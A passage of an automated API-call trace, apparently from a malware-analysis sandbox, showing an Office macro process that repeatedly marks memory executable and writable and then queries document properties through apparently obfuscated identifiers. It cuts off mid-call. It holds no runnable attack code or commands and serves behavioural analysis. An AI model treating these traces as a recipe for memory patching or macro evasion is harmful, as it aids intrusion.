FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0110.439] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.439] GetCurrentProcess () returned 0xffffffff [0110.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0110.439] GetCurrentProcess () returned 0xffffffff [0110.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0110.439] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.440] GetCurrentProcess () returned 0xffffffff [0110.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0110.440] GetCurrentProcess () returned 0xffffffff [0110.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0110.440] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.440] GetCurrentProcess () returned 0xffffffff [0110.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0110.440] GetCurrentProcess () returned 0xffffffff [0110.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0110.440] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.441] GetCurrentProcess () returned 0xffffffff [0110.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0110.441] GetCurrentProcess () returned 0xffffffff [0110.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0110.441] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.442] GetCurrentProcess () returned 0xffffffff [0110.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0110.442] GetCurrentProcess () returned 0xffffffff [0110.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0110.442] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.442] GetCurrentProcess () returned 0xffffffff [0110.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0110.442] GetCurrentProcess () returned 0xffffffff [0110.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0110.442] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.443] GetCurrentProcess () returned 0xffffffff [0110.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0110.443] GetCurrentProcess () returned 0xffffffff [0110.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0110.443] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.444] GetCurrentProcess () returned 0xffffffff [0110.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0110.444] GetCurrentProcess () returned 0xffffffff [0110.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0110.444] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.444] GetCurrentProcess () returned 0xffffffff [0110.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0110.444] GetCurrentProcess () returned 0xffffffff [0110.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0110.444] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.445] GetCurrentProcess () returned 0xffffffff [0110.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0110.445] GetCurrentProcess () returned 0xffffffff [0110.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0110.445] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.446] GetCurrentProcess () returned 0xffffffff [0110.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0110.446] GetCurrentProcess () returned 0xffffffff [0110.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0110.446] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.446] GetCurrentProcess () returned 0xffffffff [0110.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0110.446] GetCurrentProcess () returned 0xffffffff [0110.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0110.446] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.447] GetCurrentProcess () returned 0xffffffff [0110.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0110.447] GetCurrentProcess () returned 0xffffffff [0110.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0110.447] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.448] GetCurrentProcess () returned 0xffffffff [0110.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0110.448] GetCurrentProcess () returned 0xffffffff [0110.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0110.448] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.448] GetCurrentProcess () returned 0xffffffff [0110.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0110.448] GetCurrentProcess () returned 0xffffffff [0110.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0110.448] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.449] GetCurrentProcess () returned 0xffffffff [0110.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0110.449] GetCurrentProcess () returned 0xffffffff [0110.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0110.449] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.450] GetCurrentProcess () returned 0xffffffff [0110.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0110.450] GetCurrentProcess () returned 0xffffffff [0110.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0110.450] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.451] GetCurrentProcess () returned 0xffffffff [0110.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0110.451] GetCurrentProcess () returned 0xffffffff [0110.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0110.451] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.451] GetCurrentProcess () returned 0xffffffff [0110.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0110.451] GetCurrentProcess () returned 0xffffffff [0110.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0110.451] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.452] GetCurrentProcess () returned 0xffffffff [0110.452] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0110.452] GetCurrentProcess () returned 0xffffffff [0110.452] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0110.452] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.452] GetCurrentProcess () returned 0xffffffff [0110.452] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0110.452] GetCurrentProcess () returned 0xffffffff [0110.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0110.453] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.453] GetCurrentProcess () returned 0xffffffff [0110.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0110.454] GetAsyncKeyState (vKey=3) returned 0 [0110.454] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0110.454] CRetailMalloc_Alloc () returned 0xcb6a008 [0110.454] memcpy (in: _Dst=0xd015168, _Src=0x19731c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.454] memcpy (in: _Dst=0xcb6a028, _Src=0x197384, _Size=0x18 | out: _Dst=0xcb6a028) returned 0xcb6a028 [0110.454] CRetailMalloc_Realloc () returned 0xcb6a008 [0110.455] CRetailMalloc_Free () returned 0x1 [0110.455] GetCurrentProcess () returned 0xffffffff [0110.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0110.455] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.455] GetCurrentProcess () returned 0xffffffff [0110.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0110.455] GetCurrentProcess () returned 0xffffffff [0110.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0110.455] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.456] GetCurrentProcess () returned 0xffffffff [0110.456] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0110.456] GetCurrentProcess () returned 0xffffffff [0110.456] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0110.456] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.456] GetCurrentProcess () returned 0xffffffff [0110.456] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0110.457] GetCurrentProcess () returned 0xffffffff [0110.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0110.457] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.457] GetCurrentProcess () returned 0xffffffff [0110.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0110.457] GetCurrentProcess () returned 0xffffffff [0110.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0110.457] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.458] GetCurrentProcess () returned 0xffffffff [0110.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0110.458] GetCurrentProcess () returned 0xffffffff [0110.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0110.458] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.458] GetCurrentProcess () returned 0xffffffff [0110.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0110.458] GetCurrentProcess () returned 0xffffffff [0110.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0110.458] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.459] GetCurrentProcess () returned 0xffffffff [0110.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0110.459] GetCurrentProcess () returned 0xffffffff [0110.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0110.459] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.460] GetCurrentProcess () returned 0xffffffff [0110.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0110.460] GetCurrentProcess () returned 0xffffffff [0110.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0110.460] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.460] GetCurrentProcess () returned 0xffffffff [0110.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0110.460] GetCurrentProcess () returned 0xffffffff [0110.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0110.460] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.461] GetCurrentProcess () returned 0xffffffff [0110.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0110.461] GetCurrentProcess () returned 0xffffffff [0110.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0110.461] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.461] GetCurrentProcess () returned 0xffffffff [0110.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0110.461] GetCurrentProcess () returned 0xffffffff [0110.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0110.462] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.462] GetCurrentProcess () returned 0xffffffff [0110.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0110.462] GetCurrentProcess () returned 0xffffffff [0110.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0110.462] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.463] GetCurrentProcess () returned 0xffffffff [0110.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0110.463] GetCurrentProcess () returned 0xffffffff [0110.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0110.463] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.463] GetCurrentProcess () returned 0xffffffff [0110.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0110.463] GetCurrentProcess () returned 0xffffffff [0110.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0110.463] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.464] GetCurrentProcess () returned 0xffffffff [0110.464] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0110.464] GetCurrentProcess () returned 0xffffffff [0110.464] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0110.464] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.465] GetCurrentProcess () returned 0xffffffff [0110.465] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0110.465] GetCurrentProcess () returned 0xffffffff [0110.465] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0110.465] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.475] GetCurrentProcess () returned 0xffffffff [0110.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0110.475] GetCurrentProcess () returned 0xffffffff [0110.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0110.475] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.476] GetCurrentProcess () returned 0xffffffff [0110.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0110.476] GetCurrentProcess () returned 0xffffffff [0110.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0110.476] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.476] GetCurrentProcess () returned 0xffffffff [0110.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0110.477] GetCurrentProcess () returned 0xffffffff [0110.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0110.477] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.477] GetCurrentProcess () returned 0xffffffff [0110.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0110.477] GetCurrentProcess () returned 0xffffffff [0110.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0110.477] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.478] GetCurrentProcess () returned 0xffffffff [0110.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0110.478] GetCurrentProcess () returned 0xffffffff [0110.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0110.478] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.479] GetCurrentProcess () returned 0xffffffff [0110.479] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0110.479] GetCurrentProcess () returned 0xffffffff [0110.479] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0110.479] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.479] GetCurrentProcess () returned 0xffffffff [0110.479] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0110.479] GetCurrentProcess () returned 0xffffffff [0110.479] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0110.479] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.480] GetCurrentProcess () returned 0xffffffff [0110.480] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0110.480] GetCurrentProcess () returned 0xffffffff [0110.480] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0110.480] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.481] GetCurrentProcess () returned 0xffffffff [0110.481] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0110.481] GetCurrentProcess () returned 0xffffffff [0110.481] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0110.481] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.482] GetCurrentProcess () returned 0xffffffff [0110.482] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0110.482] GetCurrentProcess () returned 0xffffffff [0110.482] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0110.482] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.483] GetCurrentProcess () returned 0xffffffff [0110.483] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0110.483] GetCurrentProcess () returned 0xffffffff [0110.483] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0110.483] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.484] GetCurrentProcess () returned 0xffffffff [0110.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0110.484] GetCurrentProcess () returned 0xffffffff [0110.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0110.484] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.484] GetCurrentProcess () returned 0xffffffff [0110.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0110.484] GetCurrentProcess () returned 0xffffffff [0110.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0110.485] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.485] GetCurrentProcess () returned 0xffffffff [0110.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0110.485] GetCurrentProcess () returned 0xffffffff [0110.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0110.485] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0110.486] GetCurrentProcess () returned 0xffffffff [0110.486] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0110.487] GetAsyncKeyState (vKey=3) returned 0 [0110.487] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0110.487] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0110.633] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197c5c | out: ppsaOut=0x197c5c) returned 0x0 [0110.633] SafeArrayAllocData (psa=0xc8779a8) returned 0x0 [0110.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0110.643] CRetailMalloc_Alloc () returned 0xc856ec8 [0110.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0xc856ec8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x96\x97\x97\x96\x96\x96\x96\x96\x96\x97\x96\x96\x96\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x96\x96\x96\x97\x97\x97\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, 